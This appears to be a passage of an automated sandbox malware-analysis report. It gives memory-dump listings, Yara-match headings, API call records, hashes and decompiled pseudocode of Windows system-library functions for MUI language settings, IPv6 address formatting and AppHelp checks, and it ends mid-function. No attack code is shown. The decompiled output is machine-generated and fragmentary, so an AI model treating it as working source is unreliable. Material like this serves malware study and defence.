                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,00128CF4,?), ref: 0012F6BB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,00128CF4,?), ref: 0012F6BB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                      			E01F98788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				short* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				signed int _v32;
                                                                                                                                                      				char _v36;
                                                                                                                                                      				signed int _v40;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				signed int _v48;
                                                                                                                                                      				signed int _v52;
                                                                                                                                                      				signed int _v56;
                                                                                                                                                      				signed int _v60;
                                                                                                                                                      				char _v68;
                                                                                                                                                      				void* _t216;
                                                                                                                                                      				intOrPtr _t231;
                                                                                                                                                      				short* _t235;
                                                                                                                                                      				intOrPtr _t257;
                                                                                                                                                      				short* _t261;
                                                                                                                                                      				intOrPtr _t284;
                                                                                                                                                      				intOrPtr _t288;
                                                                                                                                                      				void* _t314;
                                                                                                                                                      				signed int _t318;
                                                                                                                                                      				short* _t319;
                                                                                                                                                      				intOrPtr _t321;
                                                                                                                                                      				void* _t328;
                                                                                                                                                      				void* _t329;
                                                                                                                                                      				char* _t332;
                                                                                                                                                      				signed int _t333;
                                                                                                                                                      				signed int* _t334;
                                                                                                                                                      				void* _t335;
                                                                                                                                                      				void* _t338;
                                                                                                                                                      				void* _t339;
                                                                                                                                                      
                                                                                                                                                      				_t328 = __edx;
                                                                                                                                                      				_t322 = __ecx;
                                                                                                                                                      				_t318 = 0;
                                                                                                                                                      				_t334 = _a4;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v48 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v52 = 0;
                                                                                                                                                      				if(_t334 == 0) {
                                                                                                                                                      					_t329 = 0xc000000d;
                                                                                                                                                      					L49:
                                                                                                                                                      					_t334[0x11] = _v56;
                                                                                                                                                      					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                      					_t334[0x12] = _v60;
                                                                                                                                                      					_t334[0x13] = _v28;
                                                                                                                                                      					_t334[0x17] = _v20;
                                                                                                                                                      					_t334[0x16] = _v48;
                                                                                                                                                      					_t334[0x18] = _v40;
                                                                                                                                                      					_t334[0x14] = _v32;
                                                                                                                                                      					_t334[0x15] = _v52;
                                                                                                                                                      					return _t329;
                                                                                                                                                      				}
                                                                                                                                                      				_v56 = 0;
                                                                                                                                                      				if(E01F98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                      					_v56 = 1;
                                                                                                                                                      					if(_v8 != 0) {
                                                                                                                                                      						_t207 = E01F7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                      					}
                                                                                                                                                      					_push(1);
                                                                                                                                                      					_v8 = _t318;
                                                                                                                                                      					E01F9718A(_t207);
                                                                                                                                                      					_t335 = _t335 + 4;
                                                                                                                                                      				}
                                                                                                                                                      				_v60 = _v60 | 0xffffffff;
                                                                                                                                                      				if(E01F98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                      					_t333 =  *_v8;
                                                                                                                                                      					_v60 = _t333;
                                                                                                                                                      					_t314 = E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                      					_push(_t333);
                                                                                                                                                      					_v8 = _t318;
                                                                                                                                                      					E01F9718A(_t314);
                                                                                                                                                      					_t335 = _t335 + 4;
                                                                                                                                                      				}
                                                                                                                                                      				_t216 = E01F98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                      				_t332 = ";";
                                                                                                                                                      				if(_t216 < 0) {
                                                                                                                                                      					L17:
                                                                                                                                                      					if(E01F98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                      						L30:
                                                                                                                                                      						if(E01F98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                      							L46:
                                                                                                                                                      							_t329 = 0;
                                                                                                                                                      							L47:
                                                                                                                                                      							if(_v8 != _t318) {
                                                                                                                                                      								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                      							}
                                                                                                                                                      							if(_v28 != _t318) {
                                                                                                                                                      								if(_v20 != _t318) {
                                                                                                                                                      									E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                      									_v20 = _t318;
                                                                                                                                                      									_v40 = _t318;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							goto L49;
                                                                                                                                                      						}
                                                                                                                                                      						_t231 = _v24;
                                                                                                                                                      						_t322 = _t231 + 4;
                                                                                                                                                      						_push(_t231);
                                                                                                                                                      						_v52 = _t322;
                                                                                                                                                      						E01F9718A(_t231);
                                                                                                                                                      						if(_t322 == _t318) {
                                                                                                                                                      							_v32 = _t318;
                                                                                                                                                      						} else {
                                                                                                                                                      							_v32 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                      						}
                                                                                                                                                      						if(_v32 == _t318) {
                                                                                                                                                      							_v52 = _t318;
                                                                                                                                                      							L58:
                                                                                                                                                      							_t329 = 0xc0000017;
                                                                                                                                                      							goto L47;
                                                                                                                                                      						} else {
                                                                                                                                                      							E01F72340(_v32, _v8, _v24);
                                                                                                                                                      							_v16 = _v32;
                                                                                                                                                      							_a4 = _t318;
                                                                                                                                                      							_t235 = E01F8E679(_v32, _t332);
                                                                                                                                                      							while(1) {
                                                                                                                                                      								_t319 = _t235;
                                                                                                                                                      								if(_t319 == 0) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								 *_t319 = 0;
                                                                                                                                                      								_t321 = _t319 + 2;
                                                                                                                                                      								E01F7E2A8(_t322,  &_v68, _v16);
                                                                                                                                                      								if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      									_a4 = _a4 + 1;
                                                                                                                                                      								}
                                                                                                                                                      								_v16 = _t321;
                                                                                                                                                      								_t235 = E01F8E679(_t321, _t332);
                                                                                                                                                      								_pop(_t322);
                                                                                                                                                      							}
                                                                                                                                                      							_t236 = _v16;
                                                                                                                                                      							if( *_v16 != _t319) {
                                                                                                                                                      								E01F7E2A8(_t322,  &_v68, _t236);
                                                                                                                                                      								if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      									_a4 = _a4 + 1;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							if(_a4 == 0) {
                                                                                                                                                      								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                      								_v52 = _v52 & 0x00000000;
                                                                                                                                                      								_v32 = _v32 & 0x00000000;
                                                                                                                                                      							}
                                                                                                                                                      							if(_v8 != 0) {
                                                                                                                                                      								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                      							}
                                                                                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                                                                                      							_t318 = 0;
                                                                                                                                                      							goto L46;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t257 = _v24;
                                                                                                                                                      					_t322 = _t257 + 4;
                                                                                                                                                      					_push(_t257);
                                                                                                                                                      					_v40 = _t322;
                                                                                                                                                      					E01F9718A(_t257);
                                                                                                                                                      					_t338 = _t335 + 4;
                                                                                                                                                      					if(_t322 == _t318) {
                                                                                                                                                      						_v20 = _t318;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v20 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                      					}
                                                                                                                                                      					if(_v20 == _t318) {
                                                                                                                                                      						_v40 = _t318;
                                                                                                                                                      						goto L58;
                                                                                                                                                      					} else {
                                                                                                                                                      						E01F72340(_v20, _v8, _v24);
                                                                                                                                                      						_v16 = _v20;
                                                                                                                                                      						_a4 = _t318;
                                                                                                                                                      						_t261 = E01F8E679(_v20, _t332);
                                                                                                                                                      						_t335 = _t338 + 0x14;
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_v12 = _t261;
                                                                                                                                                      							if(_t261 == _t318) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_v12 = _v12 + 2;
                                                                                                                                                      							 *_v12 = 0;
                                                                                                                                                      							E01F7E2A8(_v12,  &_v68, _v16);
                                                                                                                                                      							if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      								_a4 = _a4 + 1;
                                                                                                                                                      							}
                                                                                                                                                      							_v16 = _v12;
                                                                                                                                                      							_t261 = E01F8E679(_v12, _t332);
                                                                                                                                                      							_pop(_t322);
                                                                                                                                                      						}
                                                                                                                                                      						_t269 = _v16;
                                                                                                                                                      						if( *_v16 != _t318) {
                                                                                                                                                      							E01F7E2A8(_t322,  &_v68, _t269);
                                                                                                                                                      							if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      								_a4 = _a4 + 1;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						if(_a4 == _t318) {
                                                                                                                                                      							E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                      							_v40 = _t318;
                                                                                                                                                      							_v20 = _t318;
                                                                                                                                                      						}
                                                                                                                                                      						if(_v8 != _t318) {
                                                                                                                                                      							E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                      						}
                                                                                                                                                      						_v8 = _t318;
                                                                                                                                                      						goto L30;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t284 = _v24;
                                                                                                                                                      				_t322 = _t284 + 4;
                                                                                                                                                      				_push(_t284);
                                                                                                                                                      				_v48 = _t322;
                                                                                                                                                      				E01F9718A(_t284);
                                                                                                                                                      				_t339 = _t335 + 4;
                                                                                                                                                      				if(_t322 == _t318) {
                                                                                                                                                      					_v28 = _t318;
                                                                                                                                                      				} else {
                                                                                                                                                      					_v28 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                      				}
                                                                                                                                                      				if(_v28 == _t318) {
                                                                                                                                                      					_v48 = _t318;
                                                                                                                                                      					goto L58;
                                                                                                                                                      				} else {
                                                                                                                                                      					E01F72340(_v28, _v8, _v24);
                                                                                                                                                      					_v16 = _v28;
                                                                                                                                                      					_a4 = _t318;
                                                                                                                                                      					_t288 = E01F8E679(_v28, _t332);
                                                                                                                                                      					_t335 = _t339 + 0x14;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_v12 = _t288;
                                                                                                                                                      						if(_t288 == _t318) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_v12 = _v12 + 2;
                                                                                                                                                      						 *_v12 = 0;
                                                                                                                                                      						E01F7E2A8(_v12,  &_v68, _v16);
                                                                                                                                                      						if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      							_a4 = _a4 + 1;
                                                                                                                                                      						}
                                                                                                                                                      						_v16 = _v12;
                                                                                                                                                      						_t288 = E01F8E679(_v12, _t332);
                                                                                                                                                      						_pop(_t322);
                                                                                                                                                      					}
                                                                                                                                                      					_t296 = _v16;
                                                                                                                                                      					if( *_v16 != _t318) {
                                                                                                                                                      						E01F7E2A8(_t322,  &_v68, _t296);
                                                                                                                                                      						if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      							_a4 = _a4 + 1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					if(_a4 == _t318) {
                                                                                                                                                      						E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                      						_v48 = _t318;
                                                                                                                                                      						_v28 = _t318;
                                                                                                                                                      					}
                                                                                                                                                      					if(_v8 != _t318) {
                                                                                                                                                      						E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = _t318;
                                                                                                                                                      					goto L17;
                                                                                                                                                      				}
                                                                                                                                                      			}

                                                                                                                                                      0x01f98981
                                                                                                                                                      0x01f98981
                                                                                                                                                      0x01f98986
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fe1b6e
                                                                                                                                                      0x01fe1b74
                                                                                                                                                      0x01fe1b7b
                                                                                                                                                      0x01fe1b8f
                                                                                                                                                      0x01fe1b91
                                                                                                                                                      0x01fe1b91
                                                                                                                                                      0x01fe1b99
                                                                                                                                                      0x01fe1b9c
                                                                                                                                                      0x01fe1ba2
                                                                                                                                                      0x01fe1ba2
                                                                                                                                                      0x01f9898c
                                                                                                                                                      0x01f98992
                                                                                                                                                      0x01f98999
                                                                                                                                                      0x01f989ad
                                                                                                                                                      0x01fe1ba8
                                                                                                                                                      0x01fe1ba8
                                                                                                                                                      0x01f989ad
                                                                                                                                                      0x01f989b6
                                                                                                                                                      0x01f989c8
                                                                                                                                                      0x01f989cd
                                                                                                                                                      0x01f989d0
                                                                                                                                                      0x01f989d0
                                                                                                                                                      0x01f989d6
                                                                                                                                                      0x01f989e8
                                                                                                                                                      0x01f989e8
                                                                                                                                                      0x01f989ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f989ed
                                                                                                                                                      0x01f9895a
                                                                                                                                                      0x01f9883e
                                                                                                                                                      0x01f98841
                                                                                                                                                      0x01f98844
                                                                                                                                                      0x01f98845
                                                                                                                                                      0x01f98848
                                                                                                                                                      0x01f9884d
                                                                                                                                                      0x01f98852
                                                                                                                                                      0x01f98b49
                                                                                                                                                      0x01f98858
                                                                                                                                                      0x01f9886c
                                                                                                                                                      0x01f9886c
                                                                                                                                                      0x01f98872
                                                                                                                                                      0x01fe1b0e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f98878
                                                                                                                                                      0x01f98881
                                                                                                                                                      0x01f9888b
                                                                                                                                                      0x01f9888e
                                                                                                                                                      0x01f98891
                                                                                                                                                      0x01f98896
                                                                                                                                                      0x01f98899
                                                                                                                                                      0x01f98899
                                                                                                                                                      0x01f9889e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fe1b21
                                                                                                                                                      0x01fe1b27
                                                                                                                                                      0x01fe1b2e
                                                                                                                                                      0x01fe1b42
                                                                                                                                                      0x01fe1b44
                                                                                                                                                      0x01fe1b44
                                                                                                                                                      0x01fe1b4c
                                                                                                                                                      0x01fe1b4f
                                                                                                                                                      0x01fe1b55
                                                                                                                                                      0x01fe1b55
                                                                                                                                                      0x01f988a4
                                                                                                                                                      0x01f988aa
                                                                                                                                                      0x01f988b1
                                                                                                                                                      0x01f988c5
                                                                                                                                                      0x01fe1b5b
                                                                                                                                                      0x01fe1b5b
                                                                                                                                                      0x01f988c5
                                                                                                                                                      0x01f988ce
                                                                                                                                                      0x01f988e0
                                                                                                                                                      0x01f988e5
                                                                                                                                                      0x01f988e8
                                                                                                                                                      0x01f988e8
                                                                                                                                                      0x01f988ee
                                                                                                                                                      0x01f98900
                                                                                                                                                      0x01f98900
                                                                                                                                                      0x01f98905
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f98905

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • WindowsExcludedProcs, xrefs: 01F987C1
                                                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 01F98827
                                                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 01F989FC
                                                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01F98914
                                                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 01F987E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcspbrk
                                                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                      • API String ID: 402402107-258546922
                                                                                                                                                      • Opcode ID: 36445a910fd79122daf1234caea9788ee5dab5b635d612bb288253d51e220cbc
                                                                                                                                                      • Instruction ID: 6b3011008a13f806903583d462606d5803723c1b1eecc26356ac1ac1fa70605c
                                                                                                                                                      • Opcode Fuzzy Hash: 36445a910fd79122daf1234caea9788ee5dab5b635d612bb288253d51e220cbc
                                                                                                                                                      • Instruction Fuzzy Hash: 3BF1E7B2D00209EFDF11EF99CD84DEEBBB8FF18244F14446AE605A7211E7369A45DB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                                      			E01FB13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				intOrPtr* _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				intOrPtr _t71;
                                                                                                                                                      				signed int _t78;
                                                                                                                                                      				signed int _t86;
                                                                                                                                                      				char _t90;
                                                                                                                                                      				signed int _t91;
                                                                                                                                                      				signed int _t96;
                                                                                                                                                      				intOrPtr _t108;
                                                                                                                                                      				signed int _t114;
                                                                                                                                                      				void* _t115;
                                                                                                                                                      				intOrPtr _t128;
                                                                                                                                                      				intOrPtr* _t129;
                                                                                                                                                      				void* _t130;
                                                                                                                                                      
                                                                                                                                                      				_t129 = _a4;
                                                                                                                                                      				_t128 = _a8;
                                                                                                                                                      				_t116 = 0;
                                                                                                                                                      				_t71 = _t128 + 0x5c;
                                                                                                                                                      				_v8 = 8;
                                                                                                                                                      				_v20 = _t71;
                                                                                                                                                      				if( *_t129 == 0) {
                                                                                                                                                      					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                      						goto L5;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                      						if(_t96 != 0) {
                                                                                                                                                      							L38:
                                                                                                                                                      							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                      								goto L5;
                                                                                                                                                      							} else {
                                                                                                                                                      								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                      								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                      								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                      								_t86 = E01FA7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                      								L36:
                                                                                                                                                      								return _t128 + _t86 * 2;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                      						if(_t114 == 0) {
                                                                                                                                                      							L33:
                                                                                                                                                      							_t115 = 0x1f72926;
				L35:
				_push( *(_t129 + 0xf) & 0x000000ff);
				_push( *(_t129 + 0xe) & 0x000000ff);
				_push( *(_t129 + 0xd) & 0x000000ff);
				_push( *(_t129 + 0xc) & 0x000000ff);
				_t86 = E01FA7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
				goto L36;
			}
			if(_t114 != 0xffff) {
				_t116 = 0;
				goto L38;
			}
			if(_t114 != 0) {
				_t115 = 0x1f79cac;
				goto L35;
			}
			goto L33;
		}
	} else {
		L5:
		_a8 = _t116;
		_a4 = _t116;
		_v12 = _t116;
		if(( *(_t129 + 8) & 0x0000fffd) == 0) {
			if( *(_t129 + 0xa) == 0xfe5e) {
				_v8 = 6;
			}
		}
		_t90 = _v8;
		if(_t90 <= _t116) {
			L11:
			if(_a8 - _a4 <= 1) {
				_a8 = _t116;
				_a4 = _t116;
			}
			_t91 = 0;
			if(_v8 <= _t116) {
				L22:
				if(_v8 < 8) {
					_push( *(_t129 + 0xf) & 0x000000ff);
					_push( *(_t129 + 0xe) & 0x000000ff);
					_push( *(_t129 + 0xd) & 0x000000ff);
					_t128 = _t128 + E01FA7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
				}
				return _t128;
			} else {
				L14:
				L14:
				if(_a4 > _t91 || _t91 >= _a8) {
					if(_t91 != _t116 && _t91 != _a8) {
						_push(":");
						_push(_t71 - _t128 >> 1);
						_push(_t128);
						_t128 = _t128 + E01FA7707() * 2;
						_t71 = _v20;
						_t130 = _t130 + 0xc;
					}
					_t78 = E01FA7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
					_t130 = _t130 + 0x10;
				} else {
					_push(L"::");
					_push(_t71 - _t128 >> 1);
					_push(_t128);
					_t78 = E01FA7707();
					_t130 = _t130 + 0xc;
					_t91 = _a8 - 1;
				}
				_t91 = _t91 + 1;
				_t128 = _t128 + _t78 * 2;
				_t71 = _v20;
				if(_t91 >= _v8) {
					goto L22;
				}
				_t116 = 0;
				goto L14;
			}
		} else {
			_t108 = 1;
			_v16 = _t129;
			_v24 = _t90;
			do {
				if( *_v16 == _t116) {
					if(_t108 - _v12 > _a8 - _a4) {
						_a4 = _v12;
						_a8 = _t108;
					}
					_t116 = 0;
				} else {
					_v12 = _t108;
				}
				_v16 = _v16 + 2;
				_t108 = _t108 + 1;
				_t26 =  &_v24;
				 *_t26 = _v24 - 1;
			} while ( *_t26 != 0);
			goto L11;
		}
	}
}




















                                                                                                                                                      0x01fb1427
                                                                                                                                                      0x01fb142b
                                                                                                                                                      0x01fb142c
                                                                                                                                                      0x01fb142c
                                                                                                                                                      0x01fb142c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb141c
                                                                                                                                                      0x01fb1411

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                      • Opcode ID: 6fe006eee20a098f87056e25465380a5e665925468db0c82b608cb242f4191f3
                                                                                                                                                      • Instruction ID: 6e99f4016531e3197ac3f5201a1bb906c38dd8c00db239319ca448c35e9acf78
                                                                                                                                                      • Opcode Fuzzy Hash: 6fe006eee20a098f87056e25465380a5e665925468db0c82b608cb242f4191f3
                                                                                                                                                      • Instruction Fuzzy Hash: 1F6165B1D04606EACB24DF5ED8E08FFBBB6EF95300718C12EE5D647541E23AA640CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E01FA7EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v540;
                                                                                                                                                      				unsigned int _v544;
                                                                                                                                                      				signed int _v548;
                                                                                                                                                      				intOrPtr _v552;
                                                                                                                                                      				char _v556;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t33;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				unsigned int _t46;
                                                                                                                                                      				unsigned int _t47;
                                                                                                                                                      				unsigned int _t52;
                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                      				unsigned int _t62;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				intOrPtr _t72;
                                                                                                                                                      				signed int _t73;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				void* _t77;
                                                                                                                                                      
                                                                                                                                                      				_t33 =  *0x2052088; // 0x774e8a49
                                                                                                                                                      				_v8 = _t33 ^ _t73;
                                                                                                                                                      				_v548 = _v548 & 0x00000000;
                                                                                                                                                      				_t72 = _a4;
                                                                                                                                                      				if(E01FA7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                      					__eflags = _v548;
                                                                                                                                                      					if(_v548 == 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					_t62 = _t72 + 0x24;
                                                                                                                                                      					E01FC3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                      					_t71 = 0x214;
                                                                                                                                                      					_v544 = 0x214;
                                                                                                                                                      					E01F7DFC0( &_v540, 0, 0x214);
                                                                                                                                                      					_t75 = _t74 + 0x20;
                                                                                                                                                      					_t46 =  *0x2054218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                      					__eflags = _t46;
                                                                                                                                                      					if(_t46 == 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					_t47 = _v544;
                                                                                                                                                      					__eflags = _t47;
                                                                                                                                                      					if(_t47 == 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t47 - 0x214;
                                                                                                                                                      					if(_t47 >= 0x214) {
                                                                                                                                                      						goto L1;
